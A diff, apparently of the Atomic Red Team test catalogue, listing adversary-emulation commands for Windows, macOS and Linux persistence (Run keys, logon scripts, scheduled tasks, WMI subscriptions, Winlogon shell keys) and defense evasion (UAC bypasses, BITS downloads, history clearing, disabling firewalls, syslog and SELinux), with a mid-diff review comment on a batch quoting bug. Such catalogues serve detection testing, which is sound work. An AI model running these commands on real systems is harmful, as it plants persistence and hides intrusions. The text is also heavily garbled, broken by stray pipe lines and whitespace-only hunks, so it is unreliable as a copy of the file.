|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
|
|
|
|
|
del #{script_path} >nul 2>nul
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
|
|
|
|
|
del #{script_path} >nul 2>&1
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
|
|
|
|
|
- name: Scheduled Task Startup Script
|
|
|
|
|
description: 'Run an exe on user logon or system startup
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
|
|
|
|
|
the tasks, open the Task Scheduler and look in the Active Tasks pane.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
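Review bot: If the second `command:` block is the new form, `echo "#{script_command}" > #{script_path}` writes the surrounding double quotes into the batch file, and cmd treats a line that begins with a quoted token as a single program name, so a multi-word `script_command` (the cleanup's `T1037-log.txt` suggests it writes a log file) would fail with "not recognized" at logon instead of running; the earlier `echo cmd /c "#{script_command}" > #{script_path}` avoids that. Either keep the `cmd /c` wrapper or drop the quotes. Adding `/f` to the `REG.exe ADD HKCU\Environment` call is a good change, since without it a pre-existing `UserInitMprLogonScript` value makes reg.exe prompt and hang a non-interactive run; the cleanup's switch from `2>nul` to `2>&1` is likewise correct for cmd.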
|
|
|
|
@@ -2796,7 +2825,7 @@ persistence:
|
|
|
|
|
- name: Logon Scripts - Mac
|
|
|
|
|
description: 'Mac logon script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -2809,10 +2838,11 @@ persistence:
|
|
|
|
|
Populate the plist with the location of your shell script\n\n\t defaults
|
|
|
|
|
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n"
|
|
|
|
|
- name: Supicious vbs file run from startup Folder
|
|
|
|
|
description: 'vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: "vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance. Upon execution, \"T1137 Hello, World VBS!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -2827,9 +2857,11 @@ persistence:
|
|
|
|
|
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
- name: Supicious jse file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
jse files can be placed in and ran from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
|
|
|
|
|
description: "jse files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance.\nUpon execution, \"T1137 Hello, World JSE!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -2846,7 +2878,8 @@ persistence:
|
|
|
|
|
- name: Supicious bat file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
bat files can be placed in and executed from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
|
|
|
|
folder and will also run when the computer is restarted and the user logs in.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -3005,7 +3038,7 @@ persistence:
|
|
|
|
|
description: 'Netsh interacts with other operating system components using dynamic-link
|
|
|
|
|
library (DLL) files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -3017,7 +3050,7 @@ persistence:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'netsh.exe add helper #{helper_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1050:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -3430,7 +3463,7 @@ persistence:
|
|
|
|
|
- name: Plist Modification
|
|
|
|
|
description: 'Modify MacOS plist file in one of two directories
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -3523,7 +3556,7 @@ persistence:
|
|
|
|
|
description: 'Appends a start process cmdlet to the current user''s powershell
|
|
|
|
|
profile pofile that points to a malicious executable
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -3604,7 +3637,7 @@ persistence:
|
|
|
|
|
command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"''
|
|
|
|
|
>> /etc/rc.common
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1164:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -3786,11 +3819,11 @@ persistence:
|
|
|
|
|
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
|
|
|
|
|
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
|
|
|
|
/V "Atomic Red Team" /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Reg Key RunOnce
|
|
|
|
|
description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe
|
|
|
|
|
will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will
|
|
|
|
@@ -3807,11 +3840,11 @@ persistence:
|
|
|
|
|
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
|
|
|
|
|
/v 1 /d "#{thing_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
|
|
|
|
|
/v 1 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Registry RunOnce
|
|
|
|
|
description: |
|
|
|
|
|
RunOnce Key Persistence via PowerShell
|
|
|
|
@@ -3836,7 +3869,7 @@ persistence:
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
|
|
|
|
|
-Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1053:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -3941,7 +3974,7 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'at 13:20 /interactive cmd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Local
|
|
|
|
|
description: "Upon successful execution, cmd.exe will create a scheduled task
|
|
|
|
|
to spawn cmd.exe at 20:10. \n"
|
|
|
|
@@ -3961,10 +3994,10 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Remote
|
|
|
|
|
description: "Create a task on a remote system.\n\nUpon successful execution,
|
|
|
|
|
cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote
|
|
|
|
@@ -3998,10 +4031,10 @@ persistence:
|
|
|
|
|
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
|
|
|
|
|
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
|
|
|
description: "Create an atomic scheduled task that leverages native powershell
|
|
|
|
|
cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled
|
|
|
|
@@ -4021,7 +4054,7 @@ persistence:
|
|
|
|
|
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
|
|
|
|
|
>$null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1180:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -4084,7 +4117,7 @@ persistence:
|
|
|
|
|
sets it as the screensaver so it will execute for persistence. Requires a
|
|
|
|
|
reboot and logon.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -4425,7 +4458,7 @@ persistence:
|
|
|
|
|
description: 'Make, change owner, and change file attributes on a C source code
|
|
|
|
|
file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -4451,7 +4484,7 @@ persistence:
|
|
|
|
|
- name: Set a SetUID flag on file
|
|
|
|
|
description: 'This test sets the SetUID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -4469,11 +4502,11 @@ persistence:
|
|
|
|
|
sudo chmod u+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a SetGID flag on file
|
|
|
|
|
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -4491,7 +4524,7 @@ persistence:
|
|
|
|
|
sudo chmod g+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1023:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -4557,11 +4590,11 @@ persistence:
|
|
|
|
|
command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe
|
|
|
|
|
>> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create shortcut to cmd in startup folders
|
|
|
|
|
description: 'LNK file to launch CMD placed in startup folder
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -4657,10 +4690,10 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1501:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -4759,7 +4792,7 @@ persistence:
|
|
|
|
|
description: 'This test creates a Systemd service unit file and enables it as
|
|
|
|
|
a service.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -4975,10 +5008,10 @@ persistence:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'xcopy #{web_shells} #{web_shell_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{web_shell_path} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1084:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -5042,11 +5075,10 @@ persistence:
|
|
|
|
|
modified: '2019-10-15T18:43:47.703Z'
|
|
|
|
|
identifier: T1084
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Persistence
|
|
|
|
|
- name: Persistence via WMI Event Subscription
|
|
|
|
|
description: |
|
|
|
|
|
Run from an administrator powershell window
|
|
|
|
|
|
|
|
|
|
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
|
|
|
|
Run from an administrator powershell window. After running, reboot the victim machine.
|
|
|
|
|
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
|
|
|
|
|
|
|
|
|
Code references
|
|
|
|
|
|
|
|
|
@@ -5078,7 +5110,6 @@ persistence:
|
|
|
|
|
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
|
|
|
|
|
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
|
|
|
|
|
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
|
|
|
|
|
|
|
|
|
|
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
|
|
|
|
$EventConsumerToCleanup | Remove-WmiObject
|
|
|
|
|
$EventFilterToCleanup | Remove-WmiObject
|
|
|
|
@@ -5161,11 +5192,11 @@ persistence:
|
|
|
|
|
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
|
|
|
|
|
"Shell" "explorer.exe, #{binary_to_execute}" -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
|
|
|
|
|
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Winlogon Userinit Key Persistence - PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
|
|
|
|
@@ -5184,11 +5215,11 @@ persistence:
|
|
|
|
|
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
|
|
|
|
|
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
|
|
|
|
|
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Winlogon Notify Key Logon Persistence - PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
|
|
|
|
@@ -5210,7 +5241,7 @@ persistence:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
|
|
|
|
|
-Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
defense-evasion:
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
@@ -5373,10 +5404,10 @@ defense-evasion:
|
|
|
|
|
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{local_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bitsadmin Download (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
|
|
@@ -5399,10 +5430,10 @@ defense-evasion:
|
|
|
|
|
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Persist, Download, & Execute
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
|
|
|
|
@@ -5513,7 +5544,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1088:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -5629,7 +5660,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /c eventvwr.msc
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Event Viewer (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
|
|
|
@@ -5650,12 +5681,12 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
|
|
|
|
|
-ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper
|
|
|
|
|
description: 'Bypasses User Account Control using the Windows 10 Features on
|
|
|
|
|
Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5672,12 +5703,12 @@ defense-evasion:
|
|
|
|
|
fodhelper.exe
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper - PowerShell
|
|
|
|
|
description: 'PowerShell code to bypass User Account Control using the Windows
|
|
|
|
|
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5696,7 +5727,7 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using ComputerDefaults (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
|
|
|
|
@@ -5719,7 +5750,7 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC by Mocking Trusted Directories
|
|
|
|
|
description: |
|
|
|
|
|
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
|
|
|
|
@@ -5820,7 +5851,7 @@ defense-evasion:
|
|
|
|
|
description: 'Adversaries may supply CMSTP.exe with INF files infected with
|
|
|
|
|
malicious commands
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5840,12 +5871,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: CMSTP Executing UAC Bypass
|
|
|
|
|
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
|
|
|
|
|
embedding them in the RunPreSetupCommandsSection of an INF file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5865,7 +5896,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_uac} /au
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1146:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -5918,7 +5949,7 @@ defense-evasion:
|
|
|
|
|
- name: Clear Bash history (rm)
|
|
|
|
|
description: 'Clears bash history via rm
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5926,11 +5957,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'rm ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (echo)
|
|
|
|
|
description: 'Clears bash history via rm
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5938,11 +5969,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'echo "" > ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (cat dev/null)
|
|
|
|
|
description: 'Clears bash history via cat /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5950,11 +5981,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'cat /dev/null > ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (ln dev/null)
|
|
|
|
|
description: 'Clears bash history via a symlink to /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5962,23 +5993,23 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'ln -sf /dev/null ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (truncate)
|
|
|
|
|
description: 'Clears bash history via truncate
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'truncate -s0 ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear history of a bunch of shells
|
|
|
|
|
description: 'Clears the history of a bunch of different shell types by setting
|
|
|
|
|
the history size to zero
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -6078,10 +6109,10 @@ defense-evasion:
|
|
|
|
|
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
|
|
|
|
|
#{input_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1223:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -6169,7 +6200,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{local_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compiled HTML Help Remote Payload
|
|
|
|
|
description: |
|
|
|
|
|
Uses hh.exe to execute a remote compiled HTML Help payload.
|
|
|
|
@@ -6186,7 +6217,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{remote_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1090:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -6264,7 +6295,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
unset http_proxy
|
|
|
|
|
unset https_proxy
|
|
|
|
@@ -6394,7 +6425,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'control.exe #{cpl_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1207:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -6652,7 +6683,7 @@ defense-evasion:
|
|
|
|
|
updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl
|
|
|
|
|
dll to be loaded
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -6750,7 +6781,7 @@ defense-evasion:
|
|
|
|
|
description: 'Rename certutil and decode a file. This is in reference to latest
|
|
|
|
|
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -6821,7 +6852,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable iptables firewall
|
|
|
|
|
description: 'Disables the iptables firewall
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -6840,7 +6871,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable syslog
|
|
|
|
|
description: 'Disables syslog collection
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -6857,7 +6888,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable Cb Response
|
|
|
|
|
description: 'Disable the Cb Response service
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -6874,52 +6905,51 @@ defense-evasion:
|
|
|
|
|
- name: Disable SELinux
|
|
|
|
|
description: 'Disables SELinux enforcement
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
